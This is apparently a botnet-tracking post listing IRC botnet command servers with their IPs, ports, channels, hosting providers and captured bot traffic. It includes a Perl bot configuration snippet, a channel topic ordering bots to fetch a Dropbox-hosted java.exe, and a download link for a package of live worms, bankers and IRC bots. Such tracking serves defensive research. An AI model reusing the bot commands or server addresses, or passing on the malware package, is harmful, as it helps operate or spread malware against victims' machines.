$servidor=’irc.unix-ccpower.com’ unless $servidor; my $porta=’7150′; my @adms=(“byz9991”); my @canais=(“#bot”); Resolved : [irc.unix-ccpower.com] To [64.186.152.41] Resolved : [irc.unix-ccpower.com] To [195.74.52.39] Resolved : [irc.unix-ccpower.com] To [200.75.12.211] hosting infos: http://whois.domaintools.com/195.74.52.39
70.107.249.167(irc botnet hosted in United States New York Verizon Online Llc)
Remote Host Port Number 70.107.249.167 3921 NICK GX454033315964 USER vrjvsahhszuw 0 0 :GX454033315964 USERHOST GX454033315964 MODE GX454033315964 +i JOIN #GLX . hosting infos: http://whois.domaintools.com/70.107.249.167
irc.ircatt.info(Gbot variant hosted in Germany Intergenia Ag)
Remote Host Port Number 188.138.89.21 2444 gBot gBot NICK n{USA|XP}lnatesd USER n{USA|XP}lnatesd 0 0 :n{USA|XP}lnatesd JOIN #Peach mychankey PRIVMSG #Peach :[FileProt]: File protection has been enabled for C:WINDOWSsystem32Windefend.exe Now talking in #Peach Topic On: [ #Peach ] [ .prot http://dl.dropbox.com/u/24455252/bins/java.exe] Topic By: [ Atthackers ] {ARE|W7}ywdxoqh) [FileProt]: File protection already enabled for C:WindowsSystem32Windefend.exe with http://dl.dropbox.com/u/24455252/bins/java.exeRead more...
dreamxwork.no-ip.org(irc botnet hosted in Netherlands Amsterdam Ecatel Ltd)
Remote Host Port Number 50.16.237.200 80 78.47.77.34 80 89.248.164.182 3211 PONG :IRC.Secret.GoV JOIN #Lucid NICK New{USA|XP-SP2|A}6421177 USER 6421177 “” “6421177” :6421177 MODE New{USA|XP-SP2|A}6421177 +iMm PRIVMSG #Msn : 9>>-
92.243.19.35(irc botnet hosted in France Gandi)
Remote Host Port Number 92.243.19.35 1337 NICK [nLh-VNC]eftvsr USER hdadboweq “fo8.net” “rage” :hdadboweq JOIN #VnC# PRIVMSG #VnC# : [RAGE SCAN:] range: 97.x.x.x/94 threads. PONG irc.priv8net.com hosting infos: http://whois.domaintools.com/92.243.19.35
37mb malware samples
Worms,bankers,irc bots inside this package have fun reversing them Download: http://adf.ly/1sSG7
88.86.113.239(irc botnet hosted in Czech Republic Liberec Supernetwork S.r.o)
Remote Host Port Number 88.86.113.239 31092 NICK US|computername USER siruyuse UNIX UNIX :username JOIN #global# JOIN #US Now talking in #global# Topic On: [ #global# ] [ omtECZWQgee3/7w9aGStOwmHmYQVTJXFx68dXRhkVWUhNomgeVieycdUnnRaoait ] Modes On: [ #global# ] [ +smntMu ] hosting infos: http://whois.domaintools.com/88.86.113.239
74.117.174.70(irc botnet hosted in United States Seattle Kwshells Internet Services)
Remote Host Port Number 74.117.174.70 1728 PONG :puc.ssb14e.jp JOIN ##lamer## hosting infos: http://whois.domaintools.com/74.117.174.70
Firewall.yi.org(Mic bot from ccteam hosted in Turkey Istanbul Global Iletisim Hizmetleri A.s)
Resolved : [Firewall.yi.org] To [91.93.117.180] Resolved : [Firewall.yi.org] To [87.236.232.25] Remote Host Port Number 62.219.170.83 80 96.17.109.43 80 91.93.117.180 33725 87.236.232.25 33725 Now talking in #N3t Topic On: [ #N3t ] [ ] Topic By: [ cyber ] hosting infos: http://whois.domaintools.com/91.93.117.180
82.243.195.7(irc botnet hosted in France Nice Free Sas)
Remote Host Port Number 193.107.204.81 6667 WHO #bitcoin83 82.243.195.7 8333 WHO #bitcoin83 NICK x958986756 USER x958986756 8 * : x958986756 USERHOST x958986756 NICK uAoggnooyBzZnpi JOIN #bitcoin83 hosting infos: http://whois.domaintools.com/82.243.195.7